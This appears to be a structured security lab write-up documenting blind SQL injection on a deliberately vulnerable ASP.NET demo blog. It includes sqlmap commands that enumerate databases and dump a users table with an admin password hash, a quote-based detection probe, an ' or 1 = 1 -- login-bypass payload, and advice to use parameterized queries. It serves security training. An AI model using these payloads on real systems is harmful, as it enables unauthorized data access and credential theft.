## Version 1.4.1
## language: en

Feature:
  TOE:
    Acublog
  Category:
    Unsafe Input
  Location:
    http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 id (field)
  CWE:
    CWE-089: Improper Neutralization of Special Elements used in an SQL Command
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard Unsafe Inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Detect and exploit unsafe inputs
  Recommendation:
    Always use parameterized queries

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Microsoft Windows | 10.0.17763.437  |
    | Google Chrome     | 76.0.3 (64 bit) |
    | Sqlmap            | 1.3.9.18        |
  TOE information:
    Given I am accessing the site http://testaspnet.vulnweb.com
    And Entered a .NET site which uses SQL requests
    And IIS version 8.5
    And ASP.NET 2.0.5

  Scenario: Normal use case
    Given I go to "News" tab
    When I click on any news in the list
    Then the news information is displayed

  Scenario: Static detection
    When I don't have access to source code
    Then I can't do the static detection

  Scenario: Dynamic detection
    Given I try to modify the end of the URL to try a SQLI
    """
      http://testaspnet.vulnweb.com/ReadNews.aspx?id=0'
    """
    Then the content of the page disappears
    And I recognize the site is vulnerable to a blind SQL injection

  Scenario: Exploitation
    Given I try to use Sqlmap to get information
    When I try first check the database names
    Then I use the command as below:
    """
      python sqlmap.py -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 --dbs
    """
    And I get the database names:
    """
      available databases [7]:
      [*] acublog
      [*] acuforum
      [*] acuservice
      [*] master
      [*] model
      [*] msdb
      [*] tempdb
    """
    And I try to find information in acublog database
    Then I try to list the tables of database using the command "--tables"
    """
      python sqlmap.py -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\
      --dbs -D acublog --tables
    """
    And I get the tables of database
    """
      Database: acublog
      [3 tables]
      +----------+
      | comments |
      | news     |
      | users    |
      +----------+
    """
    Then I try to get the entries from users table
    Then I use the command "-T users --dump"
    """
      python sqlmap.py -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\
      -D acublog -T users --dump
    """
    And I get the entries of the table
    """
      Database: acublog
      Table: users
      [1 entry]
      +-------+-----------------------------------------+--------+
      | uname | upass                                   | alevel |
      +-------+-----------------------------------------+--------+
      | admin | 334c4a4c42fdb79d7ebc3e73b517e6f8 (none) | 0      |
      +-------+-----------------------------------------+--------+
    """
    Then I got the password and the admin user
    And I conclude it is possible to obtain sensitive data without Privileges

  Scenario: Remediation
    When the query is programmed it should use parameterized queries
    And use LINQ and Entity Framework that generates parameterized SQL commands
    Then the program can successfully avoid most of the known SQLi

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    8.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.0/10 (Medium) - CR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H

  Scenario: Correlations
    0089-sql-injection-login-bypass
      Given I access http://testaspnet.vulnweb.com/login.aspx
      When I try to use SQLi in the user input as below:
      """
      'or 1 = 1 --
      """
      And any word as a password
      Then I click on login button
      And I have access as logged user
